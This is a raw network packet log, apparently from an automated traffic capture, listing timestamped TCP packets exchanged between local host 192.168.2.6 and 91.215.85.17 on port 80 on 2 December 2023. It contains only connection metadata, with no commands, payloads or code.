                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.160630941 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.160641909 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.160650969 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.160670996 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.160785913 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.160799980 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.160810947 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.160836935 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.160861015 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.160990000 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161030054 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161042929 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161062956 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161120892 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161192894 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161206007 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161216974 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161226034 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161228895 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161252975 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161269903 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161294937 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161309004 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161322117 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161335945 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161345959 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161374092 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161398888 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161412954 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161439896 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161448002 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161453962 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161487103 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161490917 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161547899 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161561012 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161597967 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161604881 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161628962 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161643982 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161655903 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161668062 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161684990 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161721945 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161801100 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161813974 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161824942 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161834955 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161849022 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161870956 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161910057 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161933899 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161947012 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161957979 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161969900 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.161989927 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162009954 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162053108 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162066936 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162079096 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162101984 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162107944 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162121058 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162144899 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162159920 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162173986 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162194014 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162197113 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162230968 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162242889 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162255049 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162262917 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162285089 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162372112 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162384033 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162395954 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162409067 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162420988 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162446022 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162494898 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162508011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162519932 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162528038 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162532091 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162544966 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162553072 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162580013 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162607908 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162620068 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162631989 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162662029 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162728071 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162741899 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162755013 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162764072 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162766933 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162789106 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162817001 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162830114 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162852049 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162859917 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162873983 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162892103 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162925005 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162956953 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.162956953 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163011074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163026094 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163038969 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163058996 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163080931 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163096905 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163151026 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163166046 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163178921 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163184881 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163227081 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163233042 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163245916 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163258076 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163291931 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163294077 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163306952 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163319111 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163331032 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163336992 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163356066 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163397074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163408995 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163422108 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163428068 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163434029 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163456917 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163496017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163510084 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163536072 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163543940 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163549900 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163568020 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163614988 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163628101 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163640022 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163665056 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163687944 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163703918 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163714886 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163727999 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163729906 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163765907 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163808107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163841009 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163853884 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.163887978 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164045095 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164058924 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164094925 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164098024 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164114952 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164127111 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164134026 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164158106 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164160013 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164174080 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164186001 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164197922 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164210081 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164211035 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164226055 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164233923 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164247036 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164258003 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164266109 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164292097 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164314032 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164326906 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164339066 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164350986 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164360046 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164361954 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164375067 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164387941 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164398909 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164403915 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164412975 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164424896 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164444923 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164447069 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164531946 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164546013 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164558887 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164565086 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164580107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164588928 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164613962 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164614916 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164627075 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164661884 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164673090 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164731026 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164743900 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164755106 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164814949 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164828062 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164891958 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164904118 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164917946 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164922953 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164931059 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.164963961 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165008068 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165040970 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165107012 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165121078 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165133953 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165146112 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165158987 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165158987 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165170908 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165184975 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165184021 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165196896 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165201902 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165210009 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165221930 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165246964 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165256977 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165263891 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165291071 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165302992 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165314913 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165324926 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165350914 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165422916 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165436983 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165448904 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165462017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165473938 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165499926 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165507078 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165520906 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165532112 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165544987 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165556908 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165575027 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165632010 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165648937 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165661097 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165673018 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165685892 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165688038 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165703058 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165729046 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165752888 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165764093 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165765047 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165829897 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165865898 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.165869951 CET804972091.215.85.17192.168.2.6
